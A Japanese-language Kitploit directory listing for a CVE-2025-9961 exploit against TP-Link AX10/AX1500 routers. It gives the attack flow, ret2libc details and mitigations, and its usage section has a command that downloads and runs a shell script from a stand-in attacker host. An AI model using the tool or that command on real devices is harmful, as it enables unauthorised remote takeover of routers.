Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-9961 — TP-Link AX10/AX1500におけるCWMP (TR-069)のスタックバッファオーバーフローのエクスプロイト。ret2libcによるASLR回避を伴うリモートコード実行を可能にします。チェックのみ、DoS、コマンド実行モードを含みます。 | Kitploit
ツール/GitHubGitHub/yt2w/cve-2025-9961
組み込みシステムセキュリティIoTセキュリティ脆弱性分析エクスプロイトペネトレーションテストハードウェアセキュリティリモートアクセスツールバイナリエクスプロイト
GitHubyt2w/cve-2025-9961

CVE-2025-9961

TP-Link AX10/AX1500におけるCWMP (TR-069)のスタックバッファオーバーフローのエクスプロイト。ret2libcによるASLR回避を伴うリモートコード実行を可能にします。チェックのみ、DoS、コマンド実行モードを含みます。

リポジトリを見る
617ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-9961

TP-Link AX10/AX1500 CWMP バッファオーバーフロー RCE

概要

CWMP (TR-069) におけるスタックバッファオーバーフローにより、リモートコード実行が可能になります。

フィールド値
製品TP-Link AX10, AX1500
影響を受けるバージョンAX10 < 1.2.1, AX1500 < 1.3.11
CVSS8.6 (高)
タイプスタックバッファオーバーフロー
ベクトルCWMP/TR-069 (ポート 7547)
影響リモートコード実行

攻撃フロー

root@kitploit:~
flowchart LR
    A[Attacker] --> B["Malicious ACS"]
    B --> C["SetParameterValues"]
    C --> D["Stack Overflow"]
    D --> E["Overwrite PC"]
    E --> F["ret2libc"]
    F --> G["system()"]
    G --> H["RCE"]

技術詳細

脆弱性は、cwmp プロセスが SetParameterValues SOAP リクエストを処理する際に存在します。入力がバッファサイズの計算に使用されますが、境界チェックが行われません。

エクスプロイト:

  • ret2libc を使用して system() を呼び出す
  • ASLR の回避はブルートフォースにより行う
  • サービスが再起動するため、複数回の試行が可能

使用方法

root@kitploit:~
python exploit.py <target_ip> --check-only

python exploit.py 192.168.0.1 --dos

python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"

パラメータ

要件

なし(標準ライブラリを使用)

緩和策

  • 修正済みファームウェアにアップデートする
  • TR-069/CWMP を無効化する
  • ポート 7547 へのアクセスを制限する

免責事項

許可されたセキュリティテストのみに使用すること。

ツールをダウンロード
フラグ説明デフォルト値
-p, --portCWMP ポート7547
-c, --commandRCE 用のコマンドなし
-t, --timeoutソケットタイムアウト10
--dosDoS モードのみオフ
--check-only脆弱性の確認のみオフ